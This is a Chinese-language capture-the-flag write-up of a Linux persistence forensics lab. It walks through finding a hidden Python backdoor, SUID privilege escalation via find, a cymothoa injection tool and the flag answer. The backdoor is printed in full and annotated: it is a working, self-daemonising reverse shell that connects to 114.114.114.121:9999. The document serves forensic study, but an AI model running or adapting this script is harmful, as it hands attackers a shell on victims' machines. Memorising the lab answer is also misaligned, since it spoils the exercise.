
玄机——Linux权限维持

首先查找隐藏文件信息。容易在tmp文件夹下找到一个隐藏的.temp文件夹,在其中有1.py与shell.py两个文件。查看1.py文件,可以得到黑客反弹shell所连接的IP与对应端口。

root@xuanji:/tmp/.temp/libprocesshider# cat 1.py
#!/usr/bin/python3
# Attacker artifact recovered from the hidden /tmp/.temp directory: a
# daemonised reverse shell that keeps reconnecting to a hard-coded remote
# address. Annotated for analysis only; the code is reproduced unchanged.

import socket,subprocess,os,sys, time

# First fork: the parent exits immediately, so the launching shell returns
# and the child is reparented away from it.
pidrg = os.fork()
if pidrg > 0:
        sys.exit(0)

# Detach from the launching environment: neutral cwd, own session (drops the
# controlling terminal), umask cleared.
os.chdir("/")
os.setsid()
os.umask(0)
# Second fork: the session leader exits so the survivor cannot reacquire a
# controlling terminal (classic double-fork daemonisation).
drgpid = os.fork()
if drgpid > 0:
        sys.exit(0)

# Reconnect loop: runs forever and retries 2 s after any failure. While the
# remote host is unreachable this is visible as a repeated outbound SYN to
# 114.114.114.121:9999 (the SYN_SENT entry in the netstat output below).
while 1:
        try:
                # Silence the script's own stdout/stderr before spawning the shell.
                sys.stdout.flush()
                sys.stderr.flush()
                fdreg = open("/dev/null", "w")
                sys.stdout = fdreg
                sys.stderr = fdreg
                # Hard-coded remote endpoint: the IP and port are the IoCs to record.
                sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                sdregs.connect(("114.114.114.121",9999))
                # Point fds 0/1/2 at the socket so the spawned shell inherits the
                # network connection as its stdio. Forensic tell: /proc/<pid>/fd/0-2
                # of the bash process resolve to a socket instead of a tty.
                os.dup2(sdregs.fileno(),0)
                os.dup2(sdregs.fileno(),1)
                os.dup2(sdregs.fileno(),2)
                # Interactive bash; call() blocks until that shell exits, after which
                # the loop reconnects. The return value p is never used.
                p=subprocess.call(["/bin/bash","-i"])
                sdregs.close()
        except Exception:
                # Every error (e.g. connection refused) is swallowed and retried.
                pass
        time.sleep(2)

接下来我们需要知道黑客使用什么命令提权的。渗透思路一般是用sudo -l查看可执行的sudo命令,或用find查找特权(SUID)文件。由于没有办法切换到黑客登录的身份,我们只能用find查找特权文件。

root@xuanji:/tmp/.temp/libprocesshider# find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/find
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign

很明显对方是用find提的权。接下来我们需要找到对方的恶意工具位置,翻到opt文件夹时发现有隐藏文件夹,看名字易知此即为恶意工具。

root@xuanji:/opt/.cymothoa-1-beta# ls -al
total 580
drwxr-xr-x. 3 ctf  1000  16384 Aug  3  2023 .
drwxr-xr-x. 1 root root     30 Aug  3  2023 ..
-rw-r--r--. 1 ctf  1000    137 May 24  2011 Makefile
-rwxr-xr-x. 1 root root  13714 Aug  3  2023 bgrep
-rw-r--r--. 1 root root   4357 May  5  2011 bgrep.c
-rw-------. 1 root root 421888 Aug  3  2023 core
-rwxr-xr-x. 1 root root  30569 Aug  3  2023 cymothoa
-rw-r--r--. 1 ctf  1000  11348 Jul 27  2011 cymothoa.c
-rw-r--r--. 1 ctf  1000   5009 Jul 27  2011 cymothoa.h
-rwxr-xr-x. 1 root root   1229 May  5  2011 hexdump_to_cstring.pl
drwxr-xr-x. 2 root root  16384 Jul 27  2011 payloads
-rw-r--r--. 1 ctf  1000  15822 Jul 27  2011 payloads.h
-rw-r--r--. 1 ctf  1000   5011 May 24  2011 personalization.h
-rwxr-xr-x. 1 root root    964 May 24  2011 syscall_code.pl
-rw-r--r--. 1 root root   4995 May 24  2011 syscalls.txt
-rwxr-xr-x. 1 root root   9181 Aug  3  2023 udp_server
-rw-r--r--. 1 root root   1345 May 24  2011 udp_server.c

最后我们需要得到使用命令运行 ./x.xx 执行该文件 将查询的 Exec****** 值 作为flag提交

不是很理解此话的意思,看WP的意思是让我们运行1.py后查看该python进程实际执行的可执行文件是什么:脚本的shebang为/usr/bin/python3,而它只是一个符号链接,需要解析到真实路径。

root@xuanji:/tmp/.temp/libprocesshider# netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 10.244.21.32:22         10.244.0.1:49926        ESTABLISHED keepalive (6579.54/0/0)
tcp        0      1 10.244.21.32:58942      114.114.114.121:9999    SYN_SENT    on (2.51/2/0)
tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node   Path
unix  2      [ ACC ]     STREAM     LISTENING     1681395351 /var/run/mysqld/mysqld.sock
unix  2      [ ACC ]     STREAM     LISTENING     1681395011 /tmp/supervisor.sock.1
root@xuanji:/tmp/.temp/libprocesshider# ls -al /usr/bin/python3
lrwxrwxrwx. 1 root root 9 Mar 23  2014 /usr/bin/python3 -> python3.4

故最后一题答案为/usr/bin/python3.4